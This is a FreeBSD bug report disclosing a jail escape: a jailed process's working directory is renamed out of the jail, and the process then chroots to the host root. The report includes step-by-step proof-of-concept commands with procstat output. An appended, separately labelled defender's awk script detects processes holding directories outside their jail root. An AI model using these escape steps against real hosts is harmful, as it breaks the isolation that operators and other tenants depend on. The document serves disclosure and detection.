[Bug 285782] Jail escape via directory rename outside of jail $path.
Date: Sun, 30 Mar 2025 16:33:18 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=285782
Bug ID: 285782
Summary: Jail escape via directory rename outside of jail $path.
Product: Base System
Version: 14.2-RELEASE
Hardware: Any
OS: Any
Status: New
Severity: Affects Many People
Priority: ---
Component: kern
Assignee: bugs@FreeBSD.org
Reporter: crest@rlwinm.de
When a jail is created with a jail root path resolving to a directory that is
not a mountpoint, the jail root directory has a parent directory on the same
filesystem. If a jailed process has a working directory that is *NOT* the
jail's root directory (or any parent root directory) and said directory is
renamed out of the jail root directory (e.g. some confused host process
renaming a directory from the jail's "$path/tmp" to the real "/tmp", an
operator moving a PostgreSQL database cluster directory between jails, etc.),
then the jailed process has a working directory whose "../../../../../"... no
longer includes any of the jail root directories applying to the jailed process.
The exploit could be as simple as this:
First attach to a jail:
# jexec -Uroot poc2
# mkdir -vp /mnt
# cd /mnt
In a second shell move the jail's "/mnt" out of the jail:
# mv /jails/poc2/mnt /jails
Back in the original jailed shell:
# chroot ../..
# procstat -f $$
PID COMM FD T V FLAGS REF OFFSET PRO NAME
7484 sh text v r r------- - - - /bin/sh
7484 sh ctty v c rw------ - - - /dev/pts/5
7484 sh cwd v d r------- - - - /
7484 sh root v d r------- - - - /
7484 sh jail v d r------- - - - /jails/poc2
7484 sh 0 v c rw------ 13 1677336 - /dev/pts/5
7484 sh 1 v c rw------ 13 1677336 - /dev/pts/5
7484 sh 2 v c rw------ 13 1677336 - /dev/pts/5
7484 sh 10 v c rw------ 1 0 - /dev/pts/5
# at now
logger 'GAME OVER!'
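Added here as a defender's check, not part of the bug report: a POSIX shell function that scans `procstat -f` output taken from the host and flags any jailed process whose cwd or root vnode is no longer under the jail root shown in that process's `jail` row. The embedded procstat lines are constructed to mirror the report's scenario (the PIDs and paths are hypothetical).

```shell
#!/bin/sh
# Detect jailed processes holding a cwd/root directory that has been renamed
# out of their jail root. Input is `procstat -f` output as seen from the HOST.

# Constructed sample (hypothetical PIDs/paths): PID 7484 sat in the jail's
# /mnt when the operator ran `mv /jails/poc2/mnt /jails`; PID 9001 is normal.
SAMPLE_PROCSTAT='PID COMM FD T V FLAGS REF OFFSET PRO NAME
7484 sh text v r r------- - - - /jails/poc2/bin/sh
7484 sh cwd v d r------- - - - /jails/mnt
7484 sh root v d r------- - - - /jails/poc2
7484 sh jail v d r------- - - - /jails/poc2
9001 sshd cwd v d r------- - - - /jails/poc2/var/empty
9001 sshd root v d r------- - - - /jails/poc2
9001 sshd jail v d r------- - - - /jails/poc2'

# Reads procstat -f lines on stdin and prints "PID FD PATH" for every cwd or
# root vnode whose path is neither the jail root nor beneath it.
find_escaped_dirs() {
    awk '
    $3 == "jail" { jail[$1] = $NF; next }          # remember jail root per PID
    $3 == "cwd" || $3 == "root" { dir[$1 "," $3] = $NF }
    END {
        for (k in dir) {
            split(k, p, ",")
            j = jail[p[1]]
            if (j == "") continue                   # not a jailed process
            d = dir[k]
            # inside the jail only if d == root or d starts with "root/"
            if (d != j && index(d, j "/") != 1)
                print p[1], p[2], d
        }
    }'
}

# Number of escaped directories found in the constructed sample.
escaped_count() {
    printf '%s\n' "$SAMPLE_PROCSTAT" | find_escaped_dirs | wc -l | tr -d ' '
}

# Stand-alone run: prints "7484 cwd /jails/mnt" for the sample above.
printf '%s\n' "$SAMPLE_PROCSTAT" | find_escaped_dirs
```

On a live host the same check is `procstat -af | find_escaped_dirs`; any hit means a jailed process already holds a directory outside its jail root and should be treated as a possible escape in progress.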